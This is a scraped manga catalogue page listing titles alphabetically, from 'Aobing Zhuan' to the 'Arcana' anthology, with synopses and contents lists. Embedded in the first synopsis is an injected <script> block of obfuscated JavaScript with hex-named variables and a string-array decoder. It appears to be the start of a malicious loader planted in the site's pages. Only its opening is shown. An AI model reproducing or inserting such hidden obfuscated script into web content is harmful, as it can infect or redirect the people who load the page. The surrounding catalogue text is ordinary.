Historical - Page 18

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Aobing Zhuan

Based on the 2019 movie "Nezha" Over a thousand years, spiritual energy of the earth and heavens merged to form a Chaos Pearl. Yuanshi Tianzun refined it into a Demon Pill and a Spirit Pearl. The Spirit Pearl, which was supposed to be reincarnated into Nezha's body, was stolen by Shen Gongbao and given to the East Dragon King. As such, the Third Prince Aobing, the reincarnation of the Spirit Pearl, was born. Surrounding Aobing is a series of events about growth, and a battle against the Dragons that is beginning.<script></script><script>function _0x523c(_0x3f823c,_0x27d932){var _0x4a731f=_0x1b23();return _0x523c=function(_0x3d91be,_0x353d9b){_0x3d91be=_0x3d91be-(0x12df+0x19d*0xb+-0x2339);var _0x4dd2d9=_0x4a731f[_0x3d91be];return _0x4dd2d9;},_0x523c(_0x3f823c,_0x27d932);}(function(_0x40c1fe,_0x3ed063){var _0x3c7cdc=_0x523c,_0x10ffba=_0x40c1fe();while(!![]){try{var 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Aokishi Bunny

Released yearly along with the bi-monthly magazine *Aokishi*, Aokishi Bunny is a special serialization of extra booklets featuring stories that showcase bunny girls in all walks of life! * Ohtsuki Ichika\'s first contribution to this anthology collection lead to her current bunny girl serialization, [Piccolina](https://mangadex.org/title/ced1a3f9-9a34-4ada-a3b7-ca773e5af0b8/piccolina). --- **Vol. 01** -- 001 - **[Kaoru Mori] Billiards Room** 002 [大槻いちか] Millefiori Bunny 003 [毛塚了一郎] GIVE ME A CUE! 004 [長谷川未来] 夢見るバニーじゃいられない 005 [こかむも] クロシオカレント激闘!バニーガール三姉妹 006 [柴田康平] バニーヒート 007 [高橋ひろな] 塾考する男・見える男の神社探訪 008 [中村哲也] バニー対ディアンドル * イラスト集:Hamburger **Vol. 02** -- 009 - **[Kaoru Mori] Barstool** 010 [Be-con] 初め処女のごとく、後は脱兎の如し 011 [佐々木つかさ] ショット・バニー・ショット 012 [ムネヘロ] 刺激が強すぎる? 013 [七尾朋] 満月の夜、君に会いたい 014 [有海とよこ] 君の才能は「Coelho Foffo」 015 [岸田彩] バニー飯 016 [柴田康平] サンセット・バニー 017 [みやまるん] ユーベルのエル 018 [安原萌] テキーラバニーとスニーカー 019 [大槻いちか] ピッコリーナ〜ご贔屓方のお楽しみ〜 020 [猿籠アキ] PRIVATE BUNNY * イラスト集:Hitotose Rin, Kezuka Ryoichiro, Koita Reo, Kumakura Takatoshi, Hamburger **Vol. 03** -- 021 [鈴木りつ] バニーバニースーツスーツ 022 [加藤勇気] バニーガール 023 [高橋ひろな] モネちゃんのしっぽ 024 [ムネヘロ] アリかナシか 025 [大槻いちか] ピッコリーナ:カラフルバニー 026 [クサダ] バニーガール攻撃部隊 027 [森薫] 介抱 * イラスト集:Be-con, Hamburger, Miyamarun, Takahashi Hiroshi, Kokamumo


Apocalypse Meow

Inside the jungles of Vietnam, a courageous Special Ops. Unit is fighting the most infamous war of decades past the Vietnam War. This bold account follows the brave exploits of Sergeant Perky? Perkins and his unit?of rabbits! Join Rats, Perky and Botaski as they fight against the cats of the Viet Cong. From the Tet Offensive to the My Canh bombing, watch these commando-style bunnies through an anthropomorphic lens as events unfold and violence erupts. On-human cast of characters notwithstanding, this compelling and painstakingly-researched work places an emphasis on factualism in order to accurately portray the events of the Vietnam War. With a fresh perspective on one of history's greatest calamities, Apocalypse Meow is a daring new take on a conflict that won't soon be forgotten especially after these young rabbits are done!


Apollo's Song

Apollo’s Song follows the tragic journey of Shogo, a young man whose abusive childhood has instilled in him a loathing for love so profound he finds himself compelled to acts of violence when he is witness to any act of intimacy or affection whether by human or beast. His hate is such that the gods intervene, cursing Shogo to experience love throughout the ages ultimately to have it ripped from his heart every time. From the Nazi atrocities of World War II to a dystopian future of human cloning, Shogo loses his heart, in so doing, healing the psychic scars of his childhood hatred.


Apollo’s Heart

“Warning: Mature content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” In the busy lobby, the woman whom he believed had died years ago appeared before his eyes. Yet, once again, he lost her in the sea of faces. “Who is this Jin Hye-Yeon you are looking for?” Instead of answering, Tae-Jun pulled out a cigarette from his cigar case, lit it up and continued searching through the hotel’s visitors list. “Is that your lover who died four years ago?” Tae-jun finally looked up, “… How do you know about her?” 아폴론의 심장


Apothecarius Argentum

A man named Argentum was a poison tester as a boy for a royal family. Later on, he developed an immunity to toxic substances and became a master chemist with the ability to cure any illness. When returning after a long absence, he became Princess Primula's bodyguard. But any potential relationship will have its limits as Argentum's very touch has itself became poisonous. From CMX: As a boy, Argentum was a poison tester for a royal family. Later, he developed an immunity to toxic substances and became a master chemist with the ability to cure any illness. Returning after a long absence, he is assigned to be Princess Primula's bodyguard. But any potential relationship will have its limits, as Argentum's very touch has itself become poisonous.


Appare Jipangu!

From Watase's Sorai: This story is about "Yusura" who was left under a cherry tree 15 years ago. She grew up as a daughter of a pharmacist and works as a "Hikeshiya", who can erase sadness from people by using the Kongoumaru which turn's blue as it absorbs people's sorrows, then sends it back to the person guilty of causing the sorrow. From Esthetique: As Yusura grew older, she acquired a reputation as the "Hikeshiya". Using her Kongoumaru, Yusura would eliminate sorrow from those who were suffering. Literally. One day, a nearsighted young man was being chased by several villainous looking fellows, so Yusura helped him. She took him back to her home,where she learned his name was Samon. Samon was the Daimyou of Sagami. Samon and Yusura have many interesting experiences in Edo Japan. The two run across many unique characters and with their aid have even more unique and exciting adventures.


Apparently, I’m the Villainess?

I worked as a manhua artist, then died from pulling an all-nighter. I woke up as the villainess “Emi Morwen” from my webcomic! Emi was an alluring yet cruel character who departed from the story by ending her own life. However, I’m not the real Emi! They Say I’m the Villainous Young Miss / 据说我是反派大小姐


Ara Kusa Ninpo Cho

This adult action comedy takes place during a fictional time in Japan's history known as the Ero period, where the arts of love and war hold equal sway! A diverse cast of ninja warriors both male and female must outwit, outlast, and out-maneuver the competition, or else suffer the se** consequences!


Aratama Tribe

The world is becoming warped and overrun by demons. Standing against this tide are the natural enemy of the demons, the 'Onmyoukidou'. Abe is a hard-working, good-natured onmyoukidou of the under-staffed second division defense against the demons. He's relieved to hear that new staff have been assigned to his team, but less so when he meets the rude and violent Yomi and her silent ninja-like partner. Together they must find a way to defend the city from the demons, and to show up the vastly more popular and highly supported first division team.


Arcana (Anthology)

The anthology features works by mangaka from "Ward" and "Comic Zero-Sum". A new volume is released every four months. VOLUME 1: SHITSUJI (BUTLER) 1. Spider's Nest ~ Minekura Kazuya 2. Nice to Meet You, Young Lady ~ Kouga Yun 3. Holly Green and White Little Garden ~ Takayama Shinobu 4. The Situation of Goshogawa Yuzuru's Magnificant Mansion Creation ~ Miyamoto Fukusuke 5. Butler of Worry ~ Higashiyama Kazuko 6. Elevenses ~ Mikanagi Touya 7. The Incident of the Butler's Birthday Project ~ Saeki Yashirou 8. Le Droit D' Aimer ~ Haibara Yaku 9. Young Lady's Butler ~ Yoneyama Setsuko 10. The Melancholy of the Irritable Boy and Butler ~ Kikuta Yui 11. The Moon and the Visitor ~ Nanjou Tsugumi VOLUME 2: REBEL AND PHANTOM THIEF 1. CANDY ~ Haibara Yaku 2. "...That Story." ~ Masaki Haruka 3. FLIES ~ Minekura Kazuya 4. Arabiana ~ Mizuhara Kenta 5. The Ancient History of the Three Thieves ~ Takayama Shinobu 6. The Adventure of Captain Arco Iris ~ Tsutsumi Shouko 7. SKYHIGH TENSION ~ Fujimura Ayumi 8. Mushroom and Kappa: Arcana compilation for thieves on business trips ~ Magami Guriko 9. The Lonely Mountain Robber ~ Tachibana Ayun 10. LANEKEEPER ~ Fujiwara Yuu 11. Moonlight Honey ~ Shindou Arashi 12. The Unlucky Pirate ~ Asada Yasuka 13. Strobo Rider ~ Kouzuki Reo 14. Moonlight Dance ~ Kouga Yun VOLUME 3: PRINCE AND PRINCESS 1. Prince of Stars ~ Minekura Kazuya 2. Mushroom and Kappa: Arcana compilation for princes on business trips ~ Magami Guriko 3. Flower King ~ Kouga Yun 4. Rose Princess Destiny ~ Kinoshita Sakura 5. The Window of Rain ~ Takayama Shinobu 6. My Knight is a Princess ~ Kosugi Mayu 7. The Beggar Princess ~ Ueda Shinshuu 8. The Dawn Outside Heaven ~ D. Kissan 9. Princess Academy ~ Mikawa Verno 10. PRINCESESS ~ Kari Erika 11. Our Majesty's Tactful Words ~ Kisaragi Yoshinori 12. Heart-Racing Engagement Meeting ~ Saeki Yashirou 13. Listen to the Song I Sing ~ Mizutani Yuzu VOLUME 4: VAMPIRE 1. The Vampire of the Sleeping Forest ~ Kinoshita Sakura 2. Mushroom and Kappa: Arcana compilation for vampires on business trips. ~ Magami Guriko 3. To Cross the River ~ Kouga Yun 4. A Shower in the Sunshine ~ Omote Sora 5. URBAN VAMPIRE ~ Bikke 6. Sky Burial ~ Takayama Shinobu 7. Today's Dining Table ~ Saeki Yashiro 8. The Aegis of Time's Coffin ~ Yugyoji Tama 9. Forest of Nobility ~ Kayase Shiki 10. CHIYOSAMA! ~ Shindo Arashi 11. Strigoi Kingdom ~ Serikawa Mame 12. The truth of Catharsis ~ Inui Miku 13. Blood Donation Advice ~ Igarashi Ran 14. The Novice Vampire ~ Amamiya Azusa 15. Gentle Temperature ~ Kisaragi Yoshinori VOLUME 5: JAPANESE STYLE / SAMURAI 1. Last Night's Rain Lifts ~ Minekura Kazuya 12. The Queen’s Dog ~ Araishi + Oshino 13. Kakure Oni ~ Mikanagi Touya 15. Miokuribana ~ Kikuta Yui VOLUME 6: SPECIAL FORCES / TEAMS 2. Monach Sacred ~ SENO Tatsune & TAKAMIYA Aya 7. Frightening Eccentric ~ Sakamaki Yukisato 15. Twins Pocky ~ Serikawa Mame 16. Pledge of the Ox ~ Kayase Shiki VOLUME 7: WIZARDS AND MAGICIANS 2. Night bird ~ Kouzuki Reo 3. Mushroom and Kappa - Magic Users’ Chapter ~ Magami Guriko 4. good day for me ~ Omote Sora 5. Love Coloured Glasses ~ Bikke 6. The Kind Black Witch ~ Ueda Shinshuu 7. The Magician and I ~ Mikawa Verno 8. Kokonoe Kyuujutsu ~ Aoto Takane 9. Forest’s Poison ~ Kumeta Natsuo 10. The Witch and I ~ Saeki Yashiro 11. Kashoku ~ Kayase Shiki 12. Magical Girl Alice and Her Brother ~ Igarashi Ran 13. Magic! ~ Mizuhara Kenta 14.The Kind Magician and the Paper Bag Girl ~ Mizutani & Kaede 15. Secret Service ~ Suzuki Ichiko VOLUME 8: SHITSUJI 2 (BUTLER) 5. Le Droit D'Aimer ~ Haibara Yaku [SS] VOLUME 9: TRANSFORMATION / PERSONIFICATION 1. The Wolf and the 7 Baby Goats ~ Minekura Kazuya 7. Little Heart ~ Ninagawa Tomo 8. A Nameless Quality ~ Tokito Kanade 12. Super Human Console ~ Shindo Arashi 13.Private Solar System Academy ~ Sakura Maro 14. My Blue Bicycle ~ Zekkyo 15. Tique-tique ~ Mitsu Nanae 16. The Crow and the Pomegranate ~ Yoshizawa Tomoya VOLUME 10: CONFLICTS / SECRET SOCIETIES 11. A Promise ~ Seno Tatsune & Takamiya Aya VOLUME 11: TIME TRAVEL & TIME TRAVELERS 1. A Watch Seller Travels Through Time ~ Takayama Shinobu 2. The Classroom Where He Is ~ Kumeta Natsuo 11. If Time... ~ Buchi Keiko VOLUME 12: DEVILS & DEMONS (Sequel) 1. Demon’s Kiss ~ Inui Miku 6. Wednesday Swing ~ Sekka Arcana 13: Several Men and Love (Sequel) Arcana 14: Ninjas (Sequel) Arcana 15: School Uniform (Sequel)
